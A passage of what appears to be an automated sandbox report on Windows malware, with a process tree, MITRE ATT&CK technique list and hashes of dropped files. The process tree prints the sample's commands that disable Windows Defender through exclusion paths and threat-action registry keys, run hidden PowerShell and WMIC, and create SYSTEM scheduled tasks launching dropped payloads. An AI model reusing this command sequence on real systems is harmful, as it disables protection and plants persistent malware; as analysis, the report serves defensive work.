    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:940
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2072
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:792
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\WPGfhLqOzAIwKSwi\QjqNEkvr\RINoJGCKkMoTcdiU.wsf"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\WPGfhLqOzAIwKSwi\QjqNEkvr\RINoJGCKkMoTcdiU.wsf"
    3⤵
    PID:1688
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3160
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2528
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:828
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2916
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1272
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:972
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3540
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:688
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3696
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2452
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1136
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:376
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2840
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1352
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:872
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3800
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1860
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1476
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:584
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1152
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2508
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3760
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1676
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1408
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1084
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:792
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1232
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:620
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3208
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 08:03:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\XZnOdis.exe\" GH /ZHEzdidUh 385118 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2852
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "XyyyteIMwZeutaZuw"
    3⤵
    PID:2740
- C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\XZnOdis.exe
  C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\XZnOdis.exe GH /ZHEzdidUh 385118 /S
  2⤵
  PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1272
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:2416
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:3772
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:2244
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:3264
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3912
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:1060
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:3416
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2520
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:1876
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:2800
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2412
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:1192
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:2680
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:3172
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3380
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:584
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
    3⤵
    PID:3504
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      4⤵
      PID:1408
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        
        PID:3500
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3160
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        7⤵
        
        PID:2140
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
      4⤵
      PID:1592
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        5⤵
        
        PID:2328
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1688
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        7⤵
        
        PID:1936
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\dDWflr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:1540
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\DWfsODP.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2272
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "FPieTEPPuEmJrhC"
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\exBqqXh.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2588
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\aNoiifU.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:3784
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\gUCtmLP.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:3076
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\mmoOeOX.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:3484
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 01:15:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\jYChdHAn\naQUNvu.dll\",#1 /ZmNudideut 385118" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:1504
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "rrqYunoktxOQmCoCX"
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
    3⤵
    PID:3760
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\jYChdHAn\naQUNvu.dll",#1 /ZmNudideut 385118
  2⤵
  PID:3304
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\jYChdHAn\naQUNvu.dll",#1 /ZmNudideut 385118
    3⤵
    PID:1272
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
      4⤵
      PID:2872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2074676325-17294317763710458561975973085-66896659320177733981248428095-1694072130"
1⤵
PID:3872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-145206218-1466921319-99648947-1375107942036617648148596503319606874751509564965"
1⤵
PID:3404

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:1724

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\installc.bat

Filesize
301B

MD5
998ab24316795f67c26aca0f1b38c8ce

SHA1
a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

SHA256
a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

SHA512
7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files (x86)\GameSyncLink\installm.bat

Filesize
218B

MD5
94b87b86dc338b8f0c4e5869496a8a35

SHA1
2584e6496d048068f61ac72f5c08b54ad08627c3

SHA256
2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

SHA512
b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
ac1d33cb9a355f6f01262b6d957019d1

SHA1
ce54e7d9f893374d65bf17f5fecd3e58ed829634

SHA256
36600830e64f58ff353d37145b9c2064ffcb9bd7eec5229db877d66b461f29ee

SHA512
1ea34878d824b14dcf6ca8c61c622acc99bc0c5d40ad2ce670804808285e89b79fc44618c7b8eb08da6f3cc6fb24dfb385b30be8c6104f95a0a867e4679051ad

Download Submit
C:\Users\Admin\1000021002\b0dcc639cc.exe

Filesize
1.1MB

MD5
0c722eaff08d79ae5b273fd5bbbb6c34

SHA1
8172d8a27dac7d7a8831c3f3eec8c29338a61f64

SHA256
76ddc5cd1fb5b82ab32f085c238b565c7180854abe02d09b537e4fbca0f6fd37

SHA512
3493536482023fca3446d971cb0b183ba1fdb2f4c2fbf66d820a70395d0cfe8d7d39310729e9c9eee12aa1fce8b6a19a6346cdabb8944037853ec24d0bab46ff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A9377E7E528F7E56B69A81C500ABC24

Filesize
889B

MD5
3e455215095192e1b75d379fb187298a

SHA1
b1bc968bd4f49d622aa89a81f2150152a41d829c

SHA256
ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99

SHA512
54ba004d5435e8b10531431c392ed99776120d363808137de7eb59030463f863cadd02bdf918f596b6d20964b31725c2363cd7601799caa9360a1c36fe819fbd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Filesize
893B

MD5
d4ae187b4574036c2d76b6df8a8c1a30

SHA1
b06f409fa14bab33cbaf4a37811b8740b624d9e5

SHA256
a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

SHA512
1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
